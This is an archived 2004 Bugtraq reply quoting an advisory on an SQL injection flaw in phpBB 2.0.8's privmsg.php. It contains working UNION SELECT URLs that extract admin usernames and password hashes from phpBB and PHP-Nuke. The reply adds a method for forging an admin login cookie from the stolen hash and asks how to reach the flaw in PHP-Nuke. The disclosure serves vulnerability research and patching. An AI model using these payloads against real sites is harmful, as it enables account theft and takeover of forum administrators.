lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 06 Apr 2004 20:44:35 -0700
From: "T.J. Ferraro" <tjtoocool@...eaker.net>
To: bugtraq@...urityfocus.com
Cc: come2waraxe@...oo.com, shaunige@...oo.co.uk
Subject: Re: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8
    and in older versions]


The combination of the original post with the couple of follow ups that 
followed were quite effective. Putting the hash in the message instead 
of subject worked to show the whole hash. And I can't recall if it was 
discussed on this thread or not but creating the admin = 
base64_encode($aid:$md5hash:$lang) worked to further successfully push 
the severity considering that if the admin's password were greater than 
9 or 10 characters (assuming no dictionary words and using special 
chars) cracking the stolen md5 hash would not be mathematically 
feasible. So suffice it to say, this works very well. I noticed a patch 
was posted for phpBB (the patch as far as I could tell just changed a ' 
.= ' into a ' = ' correct?). However, this problem also worked on just 
the basic phpnuke. I looked around for privmsg.php within phpnuke, but 
none exists. I assume there is another file within nuke's modules where 
the '$pm_sql_user .=' exists. Already checked all the php files in the 
modules directory of Private_Messages (going off of a 6.0 distro), but 
good ol' kwrite didn't find anything when I searched the files for 
'$pm'. Any ideas? Thanks.

>
>
> Janek Vind wrote:
>
>>
>>
>> {================================================================================} 
>>
>> {                              
>> [waraxe-2004-SA#013]                              }
>> {================================================================================} 
>>
>> {                                                                                
>> }
>> {      [ Critical sql injection bug in PhpBB 2.0.8 and in older 
>> versions ]       }
>> {                                                                                
>> }
>> {================================================================================} 
>>
>>                                                                                                                                
>> Author: Janek Vind "waraxe"
>> Date: 26. March 2004
>> Location: Estonia, Tartu
>>
>>
>>
>> Affected software description:
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>>
>> PhpBB is widely used and very popular forum software, written in php.
>> Homepage:  http://www.phpbb.com/
>>
>>
>>
>> Vulnerabilities:
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> PhpBB 2.0.x is written very carefully and securely. But even there 
>> can be bugs, which
>> will give to potential malicious attacker sensitive information from 
>> database - admin's
>> username and password's md5 hash.
>>
>> So, let's look at original code from privmsg.php line 189:
>>
>>
>> ************************************************************************************* 
>>
>>
>>     // SQL to pull appropriate message, prevents nosey people
>>     // reading other peoples messages ... hopefully!
>>     //
>>     switch( $folder )
>>     {
>>         case 'inbox':
>>             $l_box_name = $lang['Inbox'];
>>             $pm_sql_user = "AND pm.privmsgs_to_userid = " . 
>> $userdata['user_id'] . "                 AND ( pm.privmsgs_type = " . 
>> PRIVMSGS_READ_MAIL . "                     OR pm.privmsgs_type = " . 
>> PRIVMSGS_NEW_MAIL . "                     OR pm.privmsgs_type = " . 
>> PRIVMSGS_UNREAD_MAIL . " )";
>>             break;
>>         case 'outbox':
>>             $l_box_name = $lang['Outbox'];
>>             $pm_sql_user = "AND pm.privmsgs_from_userid =  " . 
>> $userdata['user_id'] . "                 AND ( pm.privmsgs_type = " . 
>> PRIVMSGS_NEW_MAIL . "
>>                     OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . 
>> " ) ";
>>             break;
>>         case 'sentbox':
>>             $l_box_name = $lang['Sentbox'];
>>             $pm_sql_user = "AND pm.privmsgs_from_userid =  " . 
>> $userdata['user_id'] . "                 AND pm.privmsgs_type = " . 
>> PRIVMSGS_SENT_MAIL;
>>             break;
>>         case 'savebox':
>>             $l_box_name = $lang['Savebox'];
>>             $pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . 
>> $userdata['user_id'] . "
>>                     AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL 
>> . " )                 OR ( pm.privmsgs_from_userid = " . 
>> $userdata['user_id'] . "
>>                     AND pm.privmsgs_type = " . 
>> PRIVMSGS_SAVED_OUT_MAIL . " )                 )";
>>             break;
>>         default:
>>             message_die(GENERAL_ERROR, $lang['No_such_folder']);
>>             break;
>>     }
>>
>>     //
>>     // Major query obtains the message ...
>>     //
>>     $sql = "SELECT u.username AS username_1, u.user_id AS user_id_1, 
>> u2.username AS username_2, u2.user_id AS user_id_2, 
>> u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, 
>> u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, 
>> u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, 
>> u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text
>>         FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " 
>> pmt, " . USERS_TABLE . " u, " . USERS_TABLE . " u2         WHERE 
>> pm.privmsgs_id = $privmsgs_id
>>             AND pmt.privmsgs_text_id = pm.privmsgs_id             
>> $pm_sql_user             AND u.user_id = pm.privmsgs_from_userid 
>>             AND u2.user_id = pm.privmsgs_to_userid";
>>
>> ***************************************************************************** 
>>
>>
>> As we can see, for some reason there is "$pm_sql_user .=" in case of 
>> 'savebox'. Funny thing is, that
>> this little bug can open critical security hole to forum. First, 
>> let's try this:
>>
>> http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar 
>>
>>
>> and we get error message:
>>
>> General Error  
>> Could not query private message post information
>>
>> DEBUG MODE
>>
>> SQL Error : 1064 You have an error in your SQL syntax. Check the 
>> manual that corresponds to your MySQL server version for the right 
>> syntax to use near 'foobarAND ( ( pm.privmsgs_to_userid = 2 AND 
>> pm.privmsgs_t
>>
>> SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username 
>> AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, 
>> u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, 
>> u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, 
>> u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, 
>> pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, 
>> phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE 
>> pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id 
>> foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_type = 3 ) OR 
>> ( pm.privmsgs_from_userid = 2 AND pm.privmsgs_type = 4 ) ) AND 
>> u.user_id = pm.privmsgs_from_userid AND u2.user_id = 
>> pm.privmsgs_to_userid
>>
>> Line : 238
>> File : D:\apache_wwwroot\phpbb206c\privmsg.php    
>>
>> Next, if we request this:
>>
>> http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/* 
>>
>>
>> then we don't get any error messages. Now it's time to do something 
>> "useful":
>>
>> ********************[real-life sploit]********************
>>
>>
>> http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null 
>> FROM phpbb_users WHERE user_level=1 LIMIT 1/*
>>
>>
>> ********************[/real-life sploit]*******************
>>
>> and we will see in plaintext admin's username and password's md5 hash ;)
>>
>> And to all PhpNuke 6.x and 7.x users, here is something for you:
>>
>> http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/* 
>>
>>
>>
>>
>> Post Scriptum:
>> I really enjoy reading of the PhpBB 2.x code, because it is written 
>> with good style and it's
>> very secure. To all php programmers - I recommend to read the file 
>> "docs\codingstandards.htm" from
>> phpbb package, it will help to learn good style of the programming!
>>
>>
>>
>>
>> Greetings:
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>>    Greets to torufoorum members and to all bugtraq readers in 
>> Estonia! Tervitused!
>> Special greets to Stefano from UT Bee Clan!
>>
>>
>>
>> Contact:
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>>    come2waraxe@...oo.com
>>    Janek Vind "waraxe"
>>
>> ---------------------------------- [ EOF ] 
>> ------------------------------------
>>
>>  
>>
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ